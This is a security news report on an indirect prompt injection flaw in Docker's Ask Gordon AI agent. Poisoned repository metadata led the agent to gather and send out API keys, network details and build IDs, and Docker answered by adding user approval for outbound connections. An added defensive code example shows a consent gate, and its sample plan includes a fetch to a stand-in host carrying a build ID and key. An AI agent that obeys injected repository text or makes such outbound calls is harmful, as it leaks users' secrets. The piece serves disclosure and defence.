Vulnerability Management, AI/ML

Severe Ask Gordon AI vulnerability addressed by Docker


Major developer platform Docker has issued a new version of its Docker Desktop to fix a significant indirect prompt injection vulnerability in its new Ask Gordon AI agent that could enable the theft of private build logs and chat history, reports HackRead.

Poisoned repository metadata, combined with an ordinary "describe this repo" query from a user, could prompt Ask Gordon to retrieve API keys, internal network information, and build IDs within seconds, effectively turning the AI agent into its own command-and-control client, according to Pillar Security researchers, who discovered and reported the issue.

The attack works because the injected instructions fit the agent's existing task and toolset, look like ordinary repository data, and a "fetch details" request aligns with the agent's normal workflow and tools. Docker has addressed the issue by adding a "human-in-the-loop" control in its latest update that requires Gordon to ask the user for permission before establishing an external connection or running a tool.
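An added illustration (not Docker's code) of the kind of human-in-the-loop gate described above: an agent's planned tool calls for a "describe this repo" task pass through a dispatcher that auto-approves local reads and allowlisted hosts but requires explicit user consent before any other outbound connection or command execution. The tool names, the allowlist and the planned call sequence are constructed assumptions.

```python
from dataclasses import dataclass, field
from typing import Callable
from urllib.parse import urlparse

# Hypothetical tool names standing in for an agent's network and execution tools.
EXTERNAL_TOOLS = {"http_fetch", "run_command"}
# Constructed allowlist: hosts the agent may contact without asking the user.
ALLOWED_HOSTS = {"hub.docker.com"}


@dataclass
class ToolCall:
    name: str
    args: dict


@dataclass
class ToolGate:
    """Dispatches agent tool calls, pausing for human consent on risky ones."""
    ask_user: Callable[[ToolCall], bool]        # True only on explicit user approval
    audit: list = field(default_factory=list)   # (tool, host, allowed) records for review

    def needs_consent(self, call: ToolCall) -> bool:
        if call.name not in EXTERNAL_TOOLS:
            return False                         # local, read-only work such as reading files
        if call.name == "http_fetch":
            host = urlparse(call.args.get("url", "")).hostname or ""
            return host not in ALLOWED_HOSTS     # unknown destination: a possible exfil channel
        return True                              # any command execution needs consent

    def dispatch(self, call: ToolCall) -> tuple[bool, str]:
        if not self.needs_consent(call):
            verdict = (True, "auto-approved")
        elif self.ask_user(call):
            verdict = (True, "user approved")
        else:
            verdict = (False, "blocked: no user approval")
        host = urlparse(call.args.get("url", "")).hostname or ""
        self.audit.append((call.name, host, verdict[0]))
        return verdict


def describe_repo_plan(gate: ToolGate) -> list[tuple[str, bool, str]]:
    """Constructed call sequence for 'describe this repo'. The last call is the
    shape poisoned metadata steers toward: a fetch to an unknown host carrying
    a build ID and a (placeholder) API key in the query string."""
    plan = [
        ToolCall("read_file", {"path": "README.md"}),
        ToolCall("http_fetch", {"url": "https://hub.docker.com/v2/repositories/example"}),
        ToolCall("http_fetch", {"url": "https://collector.example/fetch?build=1234&key=PLACEHOLDER"}),
    ]
    return [(c.name, *gate.dispatch(c)) for c in plan]
```

With `ask_user=lambda call: False` (nobody approves), the first two calls proceed and the third is blocked and logged, which is the behaviour the update adds; the audit list is what a defender would review to spot an agent repeatedly trying to reach unknown hosts.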
